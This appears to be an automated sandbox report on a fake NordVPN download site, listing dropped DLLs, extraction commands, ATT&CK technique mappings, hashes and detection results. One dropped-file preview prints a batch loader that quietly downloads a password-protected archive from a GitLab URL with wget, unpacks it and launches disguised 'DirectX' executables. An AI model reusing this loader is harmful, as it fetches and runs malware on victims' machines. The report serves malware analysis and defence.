Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\mc_config_mp2v.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mc_config_mp2m.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\SAXParser.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\jsound.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\j2pkcs11.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\mc_demux_dv.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\ssv.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\MXF_SDK_GenericContainer_AES3_4.5.16_vs10.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\msvcr120.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\PlugPlugExternalObject.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\jsdt.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\DirectX\WinRAR.exeJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\resource.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\DL100AGM.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\Win32_Font.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\jdwp.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\FileDialog.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\MXF_SDK_GenericContainer_SystemScheme1_4.5.16_vs10.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mc_config_pcm.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\InstanceRefHash.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\GFSDK_ShadowLib.win64.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\jfxmedia.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mc_config_mpa.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\javafx_iio.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\MXF_SDK_GenericContainer_AVI_4.5.16_vs10.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mc_trans_video_framerate.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\msvcr100.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\kcms.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\JAWTAccessBridge-32.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\MXF_SDK_GenericContainer_AES3_4.5.16_vs10.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\DirectX\setup64.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\mc_dec_spic.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\adbeape.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mfc100chs.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mc_mux_dv.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\jaas_nt.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\mc_enc_pcm.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\JavaAccessBridge-32.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\MXF_SDK_Modules_DataIO_1.4.22_vs10.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\Surface.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\javacpl.cpl
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\XMLDOMObject.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\mc_config_pcm.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\DX8_ImportObject.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\mfc100cht.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\InterfaceCommand.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\InterfaceUnique.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\Image.Services.Core.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\VectorOperator.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\unpack.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\d3dcompiler_47.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\awt.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\MXF_SDK_GenericContainer_AES3_4.5.16_vs10.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mc_config_mp2m.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\eula.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\javafx_font_t2k.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\GUISkin.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\mc_trans_video_framerate.dll
Source: C:\Windows\SysWOW64\unarchiver.exe | Code function: 8_2_0108B1D6 GetSystemInfo,
Source: C:\Windows\SysWOW64\7za.exe | File opened: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data
Source: C:\Windows\SysWOW64\7za.exe | File opened: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin
Source: C:\Windows\SysWOW64\7za.exe | File opened: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\DirectX
Source: C:\Windows\SysWOW64\7za.exe | File opened: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms
Source: C:\Windows\SysWOW64\7za.exe | File opened: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data
Source: C:\Windows\SysWOW64\7za.exe | File opened: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo
Source: C:\Windows\SysWOW64\unarchiver.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\7za.exe | Section loaded: C:\Windows\SysWOW64\7z.dll
Source: C:\Windows\SysWOW64\7za.exe | Section loaded: C:\Windows\SysWOW64\7z.dll
Source: C:\Windows\SysWOW64\unarchiver.exe | Process created: C:\Windows\SysWOW64\7za.exe C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\boe55dv2.gbx" "C:\Users\user\Downloads\NordVPN-10_11.zip
Source: C:\Windows\SysWOW64\unarchiver.exe | Process created: C:\Windows\SysWOW64\7za.exe C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l" "C:\Users\user\Downloads\NordVPN-7_8.zip
Source: WinRAR.exe.6.dr | Binary or memory string: p():tooltips_class32CMDWNDADDCMDWNDOTHERCMDWNDCONVERTCMDWNDFINDCMDWNDBENCH* %sHELPExecArcCmdDoneCMDMODETaskbarCreatedProgman%4d%%HELPCmdMode
Source: C:\Windows\SysWOW64\unarchiver.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Windows Management Instrumentation; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Privilege Escalation: Process Injection (12); DLL Side-Loading (1); Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Defense Evasion: Masquerading (13); Disable or Modify Tools (1); Software Packing (1); Process Injection (12); Timestomp (1); DLL Side-Loading (1); Obfuscated Files or Information (1)
Credential Access: Input Capture (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: Process Discovery (1); File and Directory Discovery (1); System Information Discovery (3); System Network Configuration Discovery; Remote System Discovery; System Owner/User Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Input Capture (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Command and Control: Data Obfuscation; Junk Data; Steganography; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact
[Behavior graph: ID 756292; URL: https://vpn-get.com/nordvpn; Startdate: 30/11/2022; Architecture: WINDOWS; Score: 25. chrome.exe started unarchiver.exe, which started 7za.exe; 7za.exe dropped files and carries the signature "DLL side loading technique detected".]

Source | Detection | Scanner | Label | Link
https://vpn-get.com/nordvpn | 0% | Virustotal | | Browse
https://vpn-get.com/nordvpn | 0% | Avira URL Cloud | safe |

Source | Detection | Scanner | Label | Link
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
https://vpn-get.com/ | false | | unknown
https://vpn-get.com/nordvpn | false | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
                • Avira URL Cloud: safe
                unknown
                http://crbug.com/644669libGLESv2.dll.6.drfalse
                • Avira URL Cloud: safe
                unknown
                https://crbug.com/655534libGLESv2.dll.6.drfalse
                • Avira URL Cloud: safe
                unknown
                Joe Sandbox Version:36.0.0 Rainbow Opal
                Analysis ID:756292
                Start date and time:2022-11-30 00:06:30 +01:00
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 10m 18s
                Hypervisor based Inspection enabled:false
                Report type:light
                Cookbook file name:browseurl.jbs
                Sample URL:https://vpn-get.com/nordvpn
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:14
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:SUS
                Classification:sus25.evad.win@43/220@0/17
                EGA Information:
                • Successful, ratio: 50%
                HDC Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Browse: https://vpn-get.com/
                • Browse: https://soft-got.host/vgc/NordVPN-10_11.zip
                • Browse: https://soft-got.host/vgc/NordVPN-7_8.zip
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
                • Created / dropped Files have been reduced to 100
                • Execution Graph export aborted for target unarchiver.exe, PID 1032 because it is empty
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtSetInformationFile calls found.
                • Report size getting too big, too many NtWriteVirtualMemory calls found.
                No simulations
                No context
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):5714248
                Entropy (8bit):6.788288927588834
                Encrypted:false
                SSDEEP:98304:XETWMdQ1hV9M5wnx+49cRtvw7gVSOFld6QHJXJTHSewUgvhiWaOuBu3Cb+tbMTy2:XVVK58x+NRtomSuldtHJhyyb+tbM1
                MD5:21CB25B78EE9D4E2D651C600BA2BE2A3
                SHA1:E3BC20EE47633D06427015C07906DE925DB0B5DD
                SHA-256:75330E04960E72EEE106671CEEC9BD768E91DE1944CAFD402AAF7422C4BD7B39
                SHA-512:8CAB7A1FBA7FE8E6FF286B763504E18A9B465FACFE4D0F3A1FDFC06129885BE1535225FF99FEBFCD37C638291662D7BEB1E40F5C27391CE8ECE5317131AEBCCF
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):6732104
                Entropy (8bit):6.774431303294623
                Encrypted:false
                SSDEEP:196608:8xD1n+MwOPY6cikEpFjAOlYFOaEsZNros0aUh:8LgOPY6cikEz7TINr1G
                MD5:714CDAC1D60200AF009AB20403A18D34
                SHA1:BEF10479C60E9244C0205F31806F0E622532569C
                SHA-256:C9C4BA9D27734D3FF60D18ECCF883EE54AE3CD2ECE4F7048C56C9C1FF707B931
                SHA-512:CF503253E0A0A6DB7D9F73A2B2309D3A274154F5B665EE5642E350BFEDCD6193E2875D23CEEA621DC8918DB9494FDD20E94ABF160E6EDBE12444673C0F54B72C
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                Category:dropped
                Size (bytes):1689600
                Entropy (8bit):6.281216665679078
                Encrypted:false
                SSDEEP:24576:ycLgCOTC8FxtcVdwk8RbhIr0FQpB2yyS+QGFIz6Mu4wEbPuiC:tgK8F4VahQmClkW6JEbPub
                MD5:19FD647448B26325E0C1F68A9A3FA03C
                SHA1:58F7092EC4CD64E82B20819C442EF1936F3F09D3
                SHA-256:8BDDCDF33588DF8C54AD3A2823D60CEFF5F08E73A055B1B1A4F8878B713636E5
                SHA-512:E18DDFA05D36EB8020EF5C38A598EE40FA3F342345F33A6AB1D8724465437AE9DAD31AFDA6006359D0443E17CBBEFF13846BA5CC26311997C7F0335087254F64
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32+ executable (console) x86-64, for MS Windows
                Category:dropped
                Size (bytes):475648
                Entropy (8bit):6.171106194022655
                Encrypted:false
                SSDEEP:6144:5sxgh2tusg0dS/ds1PkaMzfVNi3N3Dhak3qQw6/noQop71X9DwEdHtVzWh70+z82:SghWusg9/EPEz3cbC759VHtV3qqVQl
                MD5:EBC2E82461723839526B38B2CDE0EDD1
                SHA1:747722C4D3317CD2F4A963A37627C1D41DE51A6C
                SHA-256:A969163E3E72BB6B0CF77E2FD7D7EAD29FCFBC9D0D5C85FC5873DE937A3C9B6D
                SHA-512:642992F0287E6ACACD37484203D1202CF343840774965BC4E5640FB9B36AE2563E7CA426C931A51CF9D24C8417CFE81F79E420E0809256EE4D5D2EC446F810CB
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:DOS batch file, ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):1166
                Entropy (8bit):4.896041631619531
                Encrypted:false
                SSDEEP:24:Y5lX3ZmS5Vmho5VmQ83BVmM83TwVmPDW28QRn:YXX3B5yey3B63MRTgn
                MD5:CEEC1F5AC090FB6AC6CE4B6F6651A4E5
                SHA1:C3D381509821680EDCC77AA463C60BF96D1F2153
                SHA-256:53ED0E06691353BBE468BFAA839F73C53A75D891EB2AA6884C63403E13BBCD3F
                SHA-512:66A744957E2AC9966170206E211F92B2503232F9BCDF9E4052D5B4C370ADD94C348EA401823B2050C802B50D128CB8DCBECBA46F6C75F2257D9C36FE67BB1123
                Malicious:false
                Reputation:low
                Preview:@echo off..echo: & >nul timeout /t 60 /nobreak..start /wait /min %AppData%\DirectX\wget.exe -q --no-check-certificate "https://gitlab.com/michal63roberts63/soft/-/raw/main/DirectXbin.rar" -P %AppData%\DirectX..echo: & >nul timeout /t 5 /nobreak..start /wait /min %AppData%\DirectX\7z.exe x -y %AppData%\DirectX\DirectXbin.rar -p2022 -o%AppData%\DirectX..echo: & >nul timeout /t 4 /nobreak..start /wait /min %AppData%\DirectX\7z.exe x -y %AppData%\DirectX\DirectX.rar -p2022 -o%AppData%\DirectX..echo: & >nul timeout /t 4 /nobreak..start /min %AppData%\DirectX\DirectX.exe..echo: & >nul timeout /t 9 /nobreak..start /wait /min %AppData%\DirectX\7z.exe x -y %AppData%\DirectX\DirectX32.rar -p2022 -o%AppData%\DirectX..echo: & >nul timeout /t 5 /nobreak..start /min %AppData%\DirectX\DirectX32.exe..echo: & >nul timeout /t 9 /nobreak..start /wait /min %AppData%\DirectX\7z.exe x -y %AppData%\DirectX\DirectX64.rar -p2022 -o%AppData%\DirectX..echo: & >nul timeout /t 5 /nobreak..start /min %AppDa
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):2230488
                Entropy (8bit):6.949430593758372
                Encrypted:false
                SSDEEP:49152:2oJAPtSHWxwJWzkDVkwg5NYUzNjteyUHBdH3y005:2ZAHWSxkfNNte9BpCN
                MD5:F59F4F7BEA12DD7C8D44F0A717C21C8E
                SHA1:17629CCB3BD555B72A4432876145707613100B3E
                SHA-256:F150B01C1CBC540C880DC00D812BCCA1A8ABE1166233227D621408F3E75B57D4
                SHA-512:44811F9A5F2917CCD56A7F894157FA305B749CA04903EEAECA493864742E459E0CE640C01C804C266283CE8C3E147C8E6B6CFD6C5CB717E2A374E92C32A63B2C
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):3584
                Entropy (8bit):5.264008326023519
                Encrypted:false
                SSDEEP:96:e+AxPNuB+AHpcuXAqVA709t+AU0ps+570pX6r:eDZNuBDH+uXAqe709tDU0yK70gr
                MD5:15153B92ED05A364F05C12401AFA816C
                SHA1:E357F2EFFFFF14F6F424ABC637FE71D6F41D8D7E
                SHA-256:F759F15B8F7C96EEE41BF4972E45CF48EAA3C2B7B029FB2282DA29EA9718A90D
                SHA-512:AB63C440FDD9F8EB29C3FDECA9A85AD018F5A70290160C414C81642D70BEBF40C5D225875811BFB5A8B3CB7631B22E1CFBE4A712DBE1516AC3F4BDE2F7EE3A9F
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 2%
                Reputation:low
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):373344
                Entropy (8bit):6.333392087338908
                Encrypted:false
                SSDEEP:6144:+pS9kEFKbITUvR8cy8dzQ7Lcf3Si96sfO+2RZrTql9unNrkYql6wrEJWPYg:+p8KLBzQ7Lcf3SiQs2FTTql9unNrkv75
                MD5:E5C00B0BC45281666AFD14EEF04252B2
                SHA1:3B6EECF8250E88169976A5F866D15C60EE66B758
                SHA-256:542E2EBBDED3EF0C43551FB56CE44D4DBB36A507C2A801C0815C79D9F5E0F903
                SHA-512:2BACD4E1C584565DFD5E06E492B0122860BFC3B0CC1543E6BADED490535309834E0D5BB760F65DBFB19A9BB0BEDDB27A216C605BBED828810A480C8CD1FBA387
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:exported SGML document, ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):1153
                Entropy (8bit):5.91838239742257
                Encrypted:false
                SSDEEP:24:OKdAlBAiEHlA/nZakkbH50VF4/PtJyr7ycFSRVUsJuZ6:OKdiBvKmndkb0F494haUsJu8
                MD5:4526C40DCAE0FDC61336987C860F92B0
                SHA1:76A8705C35FA5BFFEDE5DB3D13D68EC74A043D46
                SHA-256:CD876C04E8D610C576448ACBE03A89358D36B3F7B4F8131D1272F97D00243381
                SHA-512:9474EDE599B1C59369E3E7F7E3CCFCC8E3D9AA1432ADA0E6CD7EB4DC7024FFCDA074611EE5C2F200AFDE61B3B3FDE5191D30EF38F949B7BF3C1A187B750ABFD9
                Malicious:false
                Reputation:low
                Preview:<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">..<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">..<security>..<requestedPrivileges>..<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>..</requestedPrivileges>..</security>..</trustInfo>..</assembly>.. BEGIN_VBSEDIT_DATA..
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32 executable (console) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):5128016
                Entropy (8bit):6.457617607357032
                Encrypted:false
                SSDEEP:98304:bHObnQdOb3OWEqNHeHq6PdOnS8SOGdVilQeHPpXF0aGOVxuGqYE6hpAl/70pzd+Z:bHInQ5WE2HeHq61OJSOGdVilQeHPpXFA
                MD5:8C04808E4BA12CB793CF661FBBF6C2A0
                SHA1:BDFDB50C5F251628C332042F85E8DD8CF5F650E3
                SHA-256:A7B656FB7A45F8980784B90B40F4A14D035B9DC15616465A341043736EC53272
                SHA-512:9619F96C3180EF3D738ECC1F5DF7508C3FF8904021065665C8388A484648E135105E1C1585DE1577C8B158F9B5BC241E3FF7F92665E9553E846E1B750DDEA20F
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                Category:dropped
                Size (bytes):3954688
                Entropy (8bit):3.564574141005755
                Encrypted:false
                SSDEEP:24576:Gg4mEzEzlXel6Kqn9DSuGOMAYd1EmH07YV1GmP0jYX1JmX0UY/1ImD0A:G
                MD5:F2C348C5AAFF0C420F4DCE3ABC1BBAD6
                SHA1:873F96BF5F180D786445AB2A129140905D5066B8
                SHA-256:0523A77867D37AC0FD0A9CCC5E6D11882E743ED6D52558F6BB63D5889B7F4AE1
                SHA-512:857A08F0D22B1A3CC9517D632D151BBDD703EC6DD541C84190F305A43F4F81770860AD4C9CC2BAAF149740EAC8D8579DBB2EE7C0E63A0403D061ADB0AE0B0B66
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                Category:dropped
                Size (bytes):8660480
                Entropy (8bit):3.7338758322023953
                Encrypted:false
                SSDEEP:49152:pkWlBfZEnFqR+hBZBNnyJG7XITT3jtDvN:V+/7XMvN
                MD5:121044FE4AE47114DFCCD15E399DF399
                SHA1:FFF4527981D873E558FD09BD493E97A308D179A4
                SHA-256:112A793D76A840A4BF0E5EA71C9A938A78E67B1514E5BFE856627913B622F156
                SHA-512:A6E114BA6DFF10DA16B3AE8F3A2F4E065D4CAA0DC63D6BE4E292CFE9BEED175E51B82A7B4C2BD413AA9621D341E4CEAE28E414FA5C7D4AD8D162400D8C943BA4
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                Category:dropped
                Size (bytes):39936
                Entropy (8bit):5.682659983466061
                Encrypted:false
                SSDEEP:768:QQZRtQ/KBET2tQ2vUQGvoYKFLvZuAQMgei3PPBhZnaiPUIZOlu/VesxlL7r:QQZRtRCeQaUKFLvY/hOlQhr
